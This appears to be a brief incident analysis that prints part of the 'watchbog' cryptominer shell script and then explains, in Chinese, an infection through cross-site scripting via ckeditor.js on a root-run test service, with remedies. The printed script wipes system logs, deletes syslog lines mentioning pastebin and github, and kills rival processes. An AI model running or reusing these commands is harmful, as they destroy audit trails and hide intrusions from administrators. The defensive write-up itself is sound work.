pm=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f “/tmp/.tmpc” ]; then
successhigh
fi
fi
sleep 30
if [ ${pm} -eq 0 ];then
testhigh
if [ ${pm} -ne 0 ];then
successhigh
fi
fi
if [ ${pm} -eq 0 ];then
downloadlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
if [ ${pm} -eq 0 ];then
testlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi

fi
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
sed -i ‘/pastebin/d’ /var/log/syslog
sed -i ‘/github/d’ /var/log/syslog
echo 0>/var/spool/mail/root
fi
if [ -f “/tmp/.spread” ]; then
rm -rf /tmp/.spread
rm -rf /tmp/.tmpupdateaa
pkill -f RED
pkill -f relax
pkill -f TnF
rm -rf /opt/test/
rm -rf /tmp/.finished
rm -rf /var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1g5qf/cred/fghhhh/data/
fi

安全防护

根据被感染的文件,发现被感染的原因是跨站脚本,对外网公开的http服务里的静态资源是不对权限做校验的,脚本跟随ckeditor.js后一起加载,而且这台测试服务用root权限启动的,所以直接就被成功的注入了.

解决方案

外网访问白名单
在服务的header限制里加入白名单,禁止跨域脚本
服务使用低权限用户启动